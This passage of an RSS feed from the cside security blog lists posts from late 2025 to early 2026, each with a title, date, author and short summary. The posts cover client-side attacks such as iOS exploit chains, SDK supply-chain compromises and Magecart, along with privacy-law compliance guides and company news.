url="https://cside.com/content/images/2026/04/How-to-Prevent-Account-Takeover-Fraud---cside-blog-cover.webp" length="0" type="image/webp"/></item><item><title>Meet cside at RSAC 2026</title><link>https://cside.com/blog/meet-cside-at-rsac-2026</link><guid isPermaLink="true">https://cside.com/blog/meet-cside-at-rsac-2026</guid><description>Meet the cside time at RSAC 2026 in San Francisco. Stop by our booth S-0238 on March 24-26 or grab time with us off the floor.</description><pubDate>Mon, 23 Mar 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2026/04/cside-at-RSAC-2026---blog-cover---2--1-.png" length="0" type="image/png"/></item><item><title>DarkSword: pure JavaScript exploit chain weaponizes legitimate websites</title><link>https://cside.com/blog/darksword-pure-javascript-exploit-chain-weaponizes-legitimate-websites</link><guid isPermaLink="true">https://cside.com/blog/darksword-pure-javascript-exploit-chain-weaponizes-legitimate-websites</guid><description>DarkSword is a full-chain iOS exploit delivered via watering-hole compromises of legitimate websites. It runs entirely in JavaScript, evades binary mitigations, and drops JavaScript-based backdoors that exfiltrate sensitive data.</description><pubDate>Fri, 20 Mar 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/03/darksword_banner.webp" length="0" type="image/webp"/></item><item><title>AppsFlyer Web SDK supply-chain compromise - polymorphic crypto stealer</title><link>https://cside.com/blog/appsflyer-web-sdk-supply-chain-compromise-polymorphic-crypto-stealer</link><guid isPermaLink="true">https://cside.com/blog/appsflyer-web-sdk-supply-chain-compromise-polymorphic-crypto-stealer</guid><description>A registrar-level DNS hijack of appsflyer.com served a polymorphic crypto-stealing payload through the AppsFlyer Web SDK, affecting thousands of sites and some Node.js server environments. This post summarizes telemetry, forensic indicators, IOCs, detection guidance, and remediation steps.</description><pubDate>Wed, 18 Mar 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/03/blog_cover_blue--1-.png" length="0" type="image/png"/></item><item><title>OpenClaw Scanner for Third-Party Scripts</title><link>https://cside.com/blog/openclaw-scanner-for-third-party-scripts</link><guid isPermaLink="true">https://cside.com/blog/openclaw-scanner-for-third-party-scripts</guid><description>A free, open-source scanner that inventories third-party scripts, detects fingerprinting, audits security headers and cookies, and flags PCI DSS exposure on payment pages. Run a quick 30-second audit to reveal what code executes in your users&apos; browsers.</description><pubDate>Wed, 18 Mar 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/03/Free-Website-Scanner--Third-Party-Script-Security-.webp" length="0" type="image/webp"/></item><item><title>Inside Coruna - Web Script IOS Exploit</title><link>https://cside.com/blog/inside-coruna-web-script-ios-exploit</link><guid isPermaLink="true">https://cside.com/blog/inside-coruna-web-script-ios-exploit</guid><description>Your website could have been used to distribute this iOS exploit kit and you wouldn&apos;t have known. A full technical breakdown of Coruna: five exploit chains, 23 CVEs, and the delivery infrastructure that makes every website a potential attack vector.</description><pubDate>Sun, 08 Mar 2026 00:00:00 GMT</pubDate><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/03/coruna_feature_v5.png" length="0" type="image/png"/></item><item><title>&quot;Microsoft Clairty&quot; Isn&apos;t Microsoft Clarity: Deobfuscating a Typosquatted Ad Fraud Script</title><link>https://cside.com/blog/microsoft-clairty-isnt-microsoft-clarity-deobfuscating-a-typosquatted-ad-fraud-script</link><guid isPermaLink="true">https://cside.com/blog/microsoft-clairty-isnt-microsoft-clarity-deobfuscating-a-typosquatted-ad-fraud-script</guid><description>cside observed a new malicious client-side injection originating from a malicious browser extension impersonating Microsoft Clarity and overwriting referral tokens to redirect referral revenue to a malicious actor.</description><pubDate>Tue, 03 Mar 2026 00:00:00 GMT</pubDate><category>Attacks</category><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/03/Threat-Discovery---msclairty.com---cside---march-3-2026---Blog.webp" length="0" type="image/webp"/></item><item><title>How to block AI agents on your website | robots.txt is not enough</title><link>https://cside.com/blog/how-to-block-ai-agents-on-your-website-guide</link><guid isPermaLink="true">https://cside.com/blog/how-to-block-ai-agents-on-your-website-guide</guid><description>Robots.txt won’t stop AI agents from abusing your website. Learn how to block headless browser agents and fraudulent agents with different controls.</description><pubDate>Tue, 24 Feb 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2026/02/How-to-Block-AI-Agents--On-Your-Website---cside.webp" length="0" type="image/webp"/></item><item><title>How to Monitor Cross Border Data Transfer On Your Website | GDPR, CCPA</title><link>https://cside.com/blog/how-to-monitor-cross-border-data-transfer-on-your-website</link><guid isPermaLink="true">https://cside.com/blog/how-to-monitor-cross-border-data-transfer-on-your-website</guid><description>Your website is likely sending personal data to other countries. Learn how to track cross-border data transfers for GDPR and CCPA requirements.</description><pubDate>Thu, 12 Feb 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2026/02/How-to-Monitor---Cross-Border-Data-Transfer---cside.webp" length="0" type="image/webp"/></item><item><title>How to Prevent Website Data Breaches (to avoid GDPR &amp; CCPA fines)</title><link>https://cside.com/blog/how-to-prevent-website-data-breaches-gdpr-ccpa</link><guid isPermaLink="true">https://cside.com/blog/how-to-prevent-website-data-breaches-gdpr-ccpa</guid><description>1/3rd of breaches involve third parties. Learn how to prevent GDPR and CCPA violations by securing third-party scripts, APIs, and data flows.</description><pubDate>Fri, 06 Feb 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2026/02/How-to-prevent-website-data-breaches-to-avoid-GDPR-and-CCPA-penalties--1-.webp" length="0" type="image/webp"/></item><item><title>Comparing Tools for GDPR Compliance (the ones you need in 2026)</title><link>https://cside.com/blog/comparing-tools-for-gdpr-compliance-2026-selection-guide</link><guid isPermaLink="true">https://cside.com/blog/comparing-tools-for-gdpr-compliance-2026-selection-guide</guid><description>GDPR compliance does not live in one tool. Fragmentation confuses teams, so we wrote this guide to help you select the right GDPR tools for you.</description><pubDate>Tue, 03 Feb 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2026/02/Top-tools-for-gdpr-compliance-blog-cover-image-cside.webp" length="0" type="image/webp"/></item><item><title>What is E-skimming | Guide and Prevention Tips</title><link>https://cside.com/blog/what-is-e-skimming-guide-and-prevention-tips</link><guid isPermaLink="true">https://cside.com/blog/what-is-e-skimming-guide-and-prevention-tips</guid><description>E-skimming steals information from your web visitors before traditional security tools protect them. Learn how web skimming works and how to prevent it.</description><pubDate>Thu, 29 Jan 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2026/01/What-is-web-skimming---Guide-and-prevention-tips.webp" length="0" type="image/webp"/></item><item><title>3 Tips - The fastest way to comply with PCI DSS requirements 6.4.3 &amp; 11.6.1</title><link>https://cside.com/blog/the-fastest-way-to-comply-with-pci-dss-6-4-3</link><guid isPermaLink="true">https://cside.com/blog/the-fastest-way-to-comply-with-pci-dss-6-4-3</guid><description>Most teams overcomplicate PCI DSS 6.4.3 &amp; 11.6.1. See the fastest paths to compliance and why QSAs recommend tools over DIY.</description><pubDate>Mon, 26 Jan 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2026/01/what-is-the-fastest-way-to-comply-with-pci-dss-requirements-6-4-3-and-11-6-1.webp" length="0" type="image/webp"/></item><item><title>VCDPA: Guide to Requirements + Website Compliance</title><link>https://cside.com/blog/vcdpa-guide-to-requirements-website-compliance</link><guid isPermaLink="true">https://cside.com/blog/vcdpa-guide-to-requirements-website-compliance</guid><description>Get a clear breakdown of Virginia Consumer Data Protection Act rules, enforcement timelines, and how to manage third-party scripts correctly.</description><pubDate>Thu, 22 Jan 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2026/01/VCDPA---Virginia-Consumer-Data-Protection-Act---Requirements-and-Website-Compliance.webp" length="0" type="image/webp"/></item><item><title>Best practices for securing third party scripts on web pages</title><link>https://cside.com/blog/best-practices-for-securing-third-party-scripts</link><guid isPermaLink="true">https://cside.com/blog/best-practices-for-securing-third-party-scripts</guid><description>Third-party scripts can expose sensitive data in your users’ browsers. Learn best practices to secure client-side code and reduce breach risk.</description><pubDate>Wed, 21 Jan 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/01/Best-Practices-to-Secure-Third-Party-Scripts.webp" length="0" type="image/webp"/></item><item><title>Comparing Top Client Side Security Tools (features, reviews, pricing)</title><link>https://cside.com/blog/top-client-side-security-tools-full-guide</link><guid isPermaLink="true">https://cside.com/blog/top-client-side-security-tools-full-guide</guid><description>This selection guide dives deep into pricing, protection coverage, and more to help you choose a client-side protection tool for your website.</description><pubDate>Tue, 20 Jan 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2026/01/Comparing-client-side-security-tools-selection-guide.webp" length="0" type="image/webp"/></item><item><title>CPA (Colorado Privacy Act): Guide to Requirements + Website Compliance</title><link>https://cside.com/blog/cpa-colorado-privacy-act-guide-to-requirements-website-compliance</link><guid isPermaLink="true">https://cside.com/blog/cpa-colorado-privacy-act-guide-to-requirements-website-compliance</guid><description>Get a clear breakdown of Colorado Privacy Act rules, enforcement timelines, and how to manage third-party scripts correctly.</description><pubDate>Fri, 16 Jan 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2026/01/CPA---Colorado-Privacy-Act---Requirements-and-Website-Compliance.webp" length="0" type="image/webp"/></item><item><title>Best client-side security tools for web applications</title><link>https://cside.com/blog/best-client-side-security-tools-for-web-applications</link><guid isPermaLink="true">https://cside.com/blog/best-client-side-security-tools-for-web-applications</guid><description>Web Applications leverage client-side scripts. A multi layer monitoring approach is the best way to detect suspicious activity on those scripts.</description><pubDate>Thu, 15 Jan 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/01/Best-Client-side-Security-Tools-for-Web-Applications.webp" length="0" type="image/webp"/></item><item><title>How to detect VPN traffic on a website</title><link>https://cside.com/blog/how-to-detect-vpn-traffic-on-your-website</link><guid isPermaLink="true">https://cside.com/blog/how-to-detect-vpn-traffic-on-your-website</guid><description>U.S. and U.K. age-verification laws require companies to prevent minors from accessing restricted content, including circumvention controls against VPNs.</description><pubDate>Wed, 14 Jan 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/01/How-to-Detect-VPN-Traffic-On-Your-Website.png" length="0" type="image/png"/></item><item><title>Top AI Tools For Website Privacy Compliance in 2026 (GDPR, CPRA)</title><link>https://cside.com/blog/best-ai-tools-for-website-privacy-compliance</link><guid isPermaLink="true">https://cside.com/blog/best-ai-tools-for-website-privacy-compliance</guid><description>Website privacy compliance is getting harder. Fortunately these AI-powered tools automate the heavy lifting across GDPR, CCPA, and HIPAA.</description><pubDate>Tue, 13 Jan 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2026/01/best-ai-tools-for-website-privacy-compliance-gdpr-cpra-hipaa.webp" length="0" type="image/webp"/></item><item><title>2026 Web Security Predictions from cside&apos;s CEO</title><link>https://cside.com/blog/2026-web-security-predictions</link><guid isPermaLink="true">https://cside.com/blog/2026-web-security-predictions</guid><description>2026 will look different from past years. We&apos;ll be watching for: deepfake powered phishing, LLM hallucinated security recommendations, and AI agent attackers.</description><pubDate>Thu, 08 Jan 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/01/web-security-predictions-2026.webp" length="0" type="image/webp"/></item><item><title>Does GDPR apply to my U.S. company? (3 step self assessment)</title><link>https://cside.com/blog/does-gdpr-apply-to-my-u-s-company-3-step-self-assessment</link><guid isPermaLink="true">https://cside.com/blog/does-gdpr-apply-to-my-u-s-company-3-step-self-assessment</guid><description>GDPR might apply to your website even if you’re U.S. based. Use this 3 step checklist to see if you&apos;re at risk and the potential for financial penalties.</description><pubDate>Thu, 08 Jan 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2026/01/Does-gdpr-apply-to-u-s-companies-self-assessment.webp" length="0" type="image/webp"/></item><item><title>The Differences In Client-side Security Solutions</title><link>https://cside.com/blog/the-differences-in-client-side-security-solutions</link><guid isPermaLink="true">https://cside.com/blog/the-differences-in-client-side-security-solutions</guid><description>When a user visits a site, a web server directs the browser to fetch contents. Some from servers the website owner manages, sometimes from 3rd parties. Client-side security solutions aim to give control back to the website owner, because they are responsible for the tools on their site</description><pubDate>Tue, 06 Jan 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/01/Differences-between-client-side-security-approaches.webp" length="0" type="image/webp"/></item><item><title>10 common GDPR website compliance failures (and how to prevent them)</title><link>https://cside.com/blog/common-gdpr-compliance-failures-and-prevention</link><guid isPermaLink="true">https://cside.com/blog/common-gdpr-compliance-failures-and-prevention</guid><description>Common GDPR website compliance failures, why your team doesn&apos;t notice them on your website, and how to prevent unlawful data collection.</description><pubDate>Tue, 30 Dec 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2025/12/Common-gdpr-failures-and-how-to-prevent-them.webp" length="0" type="image/webp"/></item><item><title>Best client-side security for eCommerce?</title><link>https://cside.com/blog/best-client-side-security-for-ecommerce</link><guid isPermaLink="true">https://cside.com/blog/best-client-side-security-for-ecommerce</guid><description>eCommerce sites are heavy consumers of client-side tracking tags which creates a significant risk for malicious exfiltration of sensitive data but also legitimate tags collecting more data than is necessary to sell to data brokers. The cside solution solves these concerns with ease.</description><pubDate>Fri, 26 Dec 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/Financial-Institutions--1-.webp" length="0" type="image/webp"/></item><item><title>GDPR Penalties Explained (most common fines, large cases, and how regulators decide)</title><link>https://cside.com/blog/gdpr-penalties-explained</link><guid isPermaLink="true">https://cside.com/blog/gdpr-penalties-explained</guid><description>Understand GDPR penalties based on the different violation categories. Look at what went wrong to avoid costly fines for your organization.</description><pubDate>Fri, 26 Dec 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2025/12/What-Are-The-Fines-For-GDPR-Explained.webp" length="0" type="image/webp"/></item><item><title>Best client-side security for Financial Institutions?</title><link>https://cside.com/blog/best-client-side-security-for-financial-institutions</link><guid isPermaLink="true">https://cside.com/blog/best-client-side-security-for-financial-institutions</guid><description>Nation-state targets like Financial Institutions need to partner with vendors that understand limitations and work to get as close to full coverage as is possible. Read why many choose cside&apos;s multi-layer model.</description><pubDate>Wed, 24 Dec 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/Financial-Institutions.webp" length="0" type="image/webp"/></item><item><title>How to comply with GDPR website requirements (2026 guide)</title><link>https://cside.com/blog/how-to-comply-with-gdpr-website-requirements-2026</link><guid isPermaLink="true">https://cside.com/blog/how-to-comply-with-gdpr-website-requirements-2026</guid><description>Regulators don&apos;t care about cookie banners. This guide covers what you need to do in 2026 to minimize, document, and secure personal data on your website under GDPR.</description><pubDate>Wed, 24 Dec 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2025/12/GDPR---How-to-Comply-with-GDPR---Website-Requirements.webp" length="0" type="image/webp"/></item><item><title>NJDPA: Guide to Requirements + Website Compliance</title><link>https://cside.com/blog/njdpa-guide-to-requirements-website-compliance</link><guid isPermaLink="true">https://cside.com/blog/njdpa-guide-to-requirements-website-compliance</guid><description>Get a clear breakdown of the New Jersey Data Privacy Act rules, enforcement timelines, and how to manage third-party scripts for compliance.</description><pubDate>Tue, 23 Dec 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2025/12/NJDPA---New-Jersey-Data-Privacy-Act---Requirements-and-Website-Compliance.webp" length="0" type="image/webp"/></item><item><title>What is CSS Security? | Preventing Phishing, Clickjacking from CSS Attacks</title><link>https://cside.com/blog/what-is-css-security-preventing-phishing-clickjacking-from-css-attacks</link><guid isPermaLink="true">https://cside.com/blog/what-is-css-security-preventing-phishing-clickjacking-from-css-attacks</guid><description>CSS controls what users see. Attackers exploit that. This article explores CSS-based client-side vulnerabilities and how to protect against them.</description><pubDate>Tue, 23 Dec 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2025/12/what-is-css-security.webp" length="0" type="image/webp"/></item><item><title>Which platform offers the most comprehensive client-side script monitoring?</title><link>https://cside.com/blog/which-platform-offers-the-most-comprehensive-client-side-script-monitoring</link><guid isPermaLink="true">https://cside.com/blog/which-platform-offers-the-most-comprehensive-client-side-script-monitoring</guid><description>Technical evaluation of modern client-side security approaches and why layered detections are necessary for comprehensive coverage.</description><pubDate>Sat, 20 Dec 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2025/12/Most-Comprehensive-Solution_.webp" length="0" type="image/webp"/></item><item><title>TDPSA: Guide to Requirements + Website Compliance</title><link>https://cside.com/blog/tdpsa-guide-to-requirements-website-compliance</link><guid isPermaLink="true">https://cside.com/blog/tdpsa-guide-to-requirements-website-compliance</guid><description>Get a clear breakdown of Texas Data Privacy and Security Act rules, enforcement timelines, and how to manage third-party scripts correctly.</description><pubDate>Thu, 18 Dec 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2025/12/TDPSA---Texas-Data-Privacy-and-Security-Act---Requirements-and-Website-Compliance.webp" length="0" type="image/webp"/></item><item><title>The British Airways Attack of 2018 - The Deeper Story</title><link>https://cside.com/blog/the-british-airways-attack-of-2018-full-breakdown</link><guid isPermaLink="true">https://cside.com/blog/the-british-airways-attack-of-2018-full-breakdown</guid><description>The 2018 British Airways attack affected 429,612 individuals. See why cside bought the attacker domain to turn it into a lesson on modern web security.</description><pubDate>Mon, 15 Dec 2025 00:00:00 GMT</pubDate><category>Attacks</category><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/The-British-Airways-Attack-of-2018---Full-Attack-Breakdown---cside.webp" length="0" type="image/webp"/></item><item><title>How cside brought AI to Client-Side Security</title><link>https://cside.com/blog/how-cside-pioneers-ai-in-client-side-security</link><guid isPermaLink="true">https://cside.com/blog/how-cside-pioneers-ai-in-client-side-security</guid><description>In 2024, cside launched the first client-side security solution with integrated AI for JavaScript security analysis and compliance automation.</description><pubDate>Sun, 14 Dec 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/cside-first-platform-to-integrate-ai-into-client-side-security.webp" length="0" type="image/webp"/></item><item><title>Addressing Incorrect Claims Made by Reflectiz About cside</title><link>https://cside.com/blog/incorrect-claims-made-by-reflectiz-about-cside</link><guid isPermaLink="true">https://cside.com/blog/incorrect-claims-made-by-reflectiz-about-cside</guid><description>Learn why Reflectiz’s scanner-based claims about cside are incorrect and how cside’s real-time client-side security provides deeper protection, full payload forensics, and PCI DSS 4.0.1 compliance.</description><pubDate>Mon, 08 Dec 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/addressing-incorrect-claims.png" length="0" type="image/png"/></item><item><title>What is Magecart: Complete Guide and Prevention Strategy</title><link>https://cside.com/blog/magecart-attacks-guide-and-prevention-steps</link><guid isPermaLink="true">https://cside.com/blog/magecart-attacks-guide-and-prevention-steps</guid><description>Magecart attacks steal card data in the browser before traditional tools detect them. Learn how Magecart attacks work and entry points used by attackers.</description><pubDate>Tue, 02 Dec 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2025/12/What-is-Magecart---Complete-Guide-and-Automated-Prevention.webp" length="0" type="image/webp"/></item><item><title>Script Integrity Management for e-commerce Brands (SRI, Dynamic Scripts)</title><link>https://cside.com/blog/script-integrity-management-for-e-commerce-brands-sri-dynamic-scripts</link><guid isPermaLink="true">https://cside.com/blog/script-integrity-management-for-e-commerce-brands-sri-dynamic-scripts</guid><description>Deep dive into script integrity vs Subresource Integrity vs behavioral monitoring for PCI DSS 6.4.3, 11.6.1, ISO 27001, and HIPAA compliance.</description><pubDate>Wed, 26 Nov 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/11/Verify-Script-Integrity-for-Compliance-Article.webp" length="0" type="image/webp"/></item><item><title>CTDPA: Guide to Requirements + Third-Party Script Compliance</title><link>https://cside.com/blog/ctdpa-guide-to-requirements-third-party-script-compliance</link><guid isPermaLink="true">https://cside.com/blog/ctdpa-guide-to-requirements-third-party-script-compliance</guid><description>Get a clear breakdown of Connecticut Data Privacy Act rules, enforcement timelines, and how to manage third-party scripts correctly.</description><pubDate>Tue, 25 Nov 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2025/11/Featured-Image-CTDPA---Connecticut-Data-Privacy-Act.png" length="0" type="image/png"/></item><item><title>Expired Domain Risks: A Real Example from Oracle’s Website</title><link>https://cside.com/blog/expired-domain-risks-a-real-example-from-oracles-website</link><guid isPermaLink="true">https://cside.com/blog/expired-domain-risks-a-real-example-from-oracles-website</guid><description>An expired domain reference is all an attacker needs to execute phishing under a trusted origin. This blog looks at an example from Oracle’s code.</description><pubDate>Tue, 25 Nov 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2025/11/Featured-Image-Oracle-Expired-Domain.png" length="0" type="image/png"/></item><item><title>The Cloudflare incident: How cside minimized customer impact</title><link>https://cside.com/blog/the-cloudflare-incident-how-cside-minimized-customer-impact</link><guid isPermaLink="true">https://cside.com/blog/the-cloudflare-incident-how-cside-minimized-customer-impact</guid><description>On November 18th, Cloudflare had an incident that impacted thousands of customers. This blog explores how we limited impact to our own customers.</description><pubDate>Fri, 21 Nov 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/11/Featured-Image-Cloudflare-November-18-incident--1-.png" length="0" type="image/png"/></item><item><title>How WebView mobile apps are dangerous for banking</title><link>https://cside.com/blog/webview-mobile-apps-client-side-attacks</link><guid isPermaLink="true">https://cside.com/blog/webview-mobile-apps-client-side-attacks</guid><description>Banking &quot;apps&quot; that run on browser environments expose credentials without teams realizing it. This article explores examples of WebView mobile app attacks.</description><pubDate>Fri, 21 Nov 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/11/Featured-Image-How-WebView-Mobile-Apps-are-Dangerous-for-Banking.png" length="0" type="image/png"/></item><item><title>Shady Plugins in WooCommerce: Security Risks &amp; Protection Tips</title><link>https://cside.com/blog/shady-plugins-in-woocommerce-security-risks-protection-tips</link><guid isPermaLink="true">https://cside.com/blog/shady-plugins-in-woocommerce-security-risks-protection-tips</guid><description>Your checkout is only as safe as your plugins. Discover how WooCommerce handles plugin HTML, why that matters, and the steps to stop malicious code.</description><pubDate>Wed, 19 Nov 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2025/11/shady-plugins-woocommerce-defense-tips-featured-image.png" length="0" type="image/png"/></item><item><title>Fail Open Architectures: the importance of being ready for a bad day.</title><link>https://cside.com/blog/fail-open-architecture-cside</link><guid isPermaLink="true">https://cside.com/blog/fail-open-architecture-cside</guid><description>Customers diligently ask: “what happens if cside goes down?” or “will it add latency?”. This is how our fail-open architecture is prepared for a bad day.</description><pubDate>Fri, 14 Nov 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/what-if-cside-goes-down---fail-open-architecture--1-.webp" length="0" type="image/webp"/></item><item><title>How Merchants Can Prevent Chargebacks (tools you need in 2026)</title><link>https://cside.com/blog/how-merchants-can-prevent-chargebacks-tools-you-need-in-2026</link><guid isPermaLink="true">https://cside.com/blog/how-merchants-can-prevent-chargebacks-tools-you-need-in-2026</guid><description>Still have a chargeback stack built for the pre-VAMP era? Here&apos;s how leading fraud teams use early dispute blocking to stay ahead of tighter rules in 2026.</description><pubDate>Sat, 08 Nov 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2025/12/How-Merchants-Can-Prevent-Chargebacks--1-.webp" length="0" type="image/webp"/></item><item><title>How to Bypass JavaScript Agents, CSP, and Crawlers (Client-Side Security Testing)</title><link>https://cside.com/blog/bypass-javascript-agents-csp-and-crawlers-security-testing</link><guid isPermaLink="true">https://cside.com/blog/bypass-javascript-agents-csp-and-crawlers-security-testing</guid><description>Most client-side compliance tools can be easily bypassed. We show you how to test weaknesses in CSP, crawler, and JS agents + safer alternatives.</description><pubDate>Tue, 21 Oct 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/How-to-Bypass-JS-Agents--CSP--and-Crawlers.webp" length="0" type="image/webp"/></item><item><title>Device Fingerprinting in CE 3.0 | How to Block More Chargeback Disputes</title><link>https://cside.com/blog/device-fingerprinting-for-compelling-evidence-chargebacks</link><guid isPermaLink="true">https://cside.com/blog/device-fingerprinting-for-compelling-evidence-chargebacks</guid><description>This is how merchants use device fingerprinting to win more Compelling Evidence cases (VISA), blocking first-party fraud and lowering VAMP ratios.</description><pubDate>Tue, 21 Oct 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2025/12/Device-Fingerprinting-to-Fight-Chargeback-Fraud--1-.webp" length="0" type="image/webp"/></item><item><title>Why Chargeback Indemnification No Longer Works With the New VAMP Ratio</title><link>https://cside.com/blog/why-chargeback-indemnification-no-longer-works-with-the-new-vamp-ratio</link><guid isPermaLink="true">https://cside.com/blog/why-chargeback-indemnification-no-longer-works-with-the-new-vamp-ratio</guid><description>Chargeback indemnification won&apos;t protect you under new VAMP rules. You still face the risk of penalties and account termination. Here&apos;s how to adapt:</description><pubDate>Thu, 09 Oct 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/content/images/2025/12/Why-Chargeback-Indemnification-Does-Not-Work-With-New-VAMP-Rules.webp" length="0" type="image/webp"/></item><item><title>What is Client-Side Security?</title><link>https://cside.com/blog/what-is-client-side-security</link><guid isPermaLink="true">https://cside.com/blog/what-is-client-side-security</guid><description>Browsers are powerful feature rich environments. More applications also are effectively browsers behind the scenes. This is great for building an application, but bad actors also use the client as an attack surface.</description><pubDate>Thu, 02 Oct 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/What-is-Client-Side-Security--1-.webp" length="0" type="image/webp"/></item><item><title>Mockito docs hijacked</title><link>https://cside.com/blog/mockito-docs-hijacked</link><guid isPermaLink="true">https://cside.com/blog/mockito-docs-hijacked</guid><description>Some attacks are stupidly low tech. Mockito, a popular open source package contained a malicious link in their Github Docs.</description><pubDate>Tue, 30 Sep 2025 00:00:00 GMT</pubDate><category>Attacks</category><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/Mockito-Docs-Hijacked.webp" length="0" type="image/webp"/></item><item><title>Vibe Coding Security Risks: Client-Side Exposures in AI Platforms (Lovable, Copilot, Cursor &amp; more)</title><link>https://cside.com/blog/vibe-coding-security-risks-ai-platforms</link><guid isPermaLink="true">https://cside.com/blog/vibe-coding-security-risks-ai-platforms</guid><description>Understand the common vulnerabilities in code made with AI coding platforms like Lovable, Copilot, Cursor, + Replit. See how to fix them before you ship them.</description><pubDate>Tue, 30 Sep 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/vibe-coding-security-risks-lovable-cursor-ai-platforms.webp" length="0" type="image/webp"/></item><item><title>Chargebacks911 and cside Partner to Fight Chargeback Fraud</title><link>https://cside.com/blog/chargebacks911-and-cside-partner-to-fight-chargeback-fraud-2</link><guid isPermaLink="true">https://cside.com/blog/chargebacks911-and-cside-partner-to-fight-chargeback-fraud-2</guid><description>We&apos;re excited to reveal our partnership with Chargebacks911. Merging CB911’s expertise with cside’s client-side intelligence helps merchants fight friendly fraud and win more chargeback disputes.</description><pubDate>Tue, 09 Sep 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2025/12/image-cside-partners-with-chargebacks911--2-.webp" length="0" type="image/webp"/></item><item><title>cside Joins AWS Partner Network and ISV Accelerate</title><link>https://cside.com/blog/cside-aws-partner-network</link><guid isPermaLink="true">https://cside.com/blog/cside-aws-partner-network</guid><description>Working alongside AWS helps us bring our solution to the cloud environment our customers already rely on. For us, this is a step towards making client-side security widely accessible.</description><pubDate>Tue, 09 Sep 2025 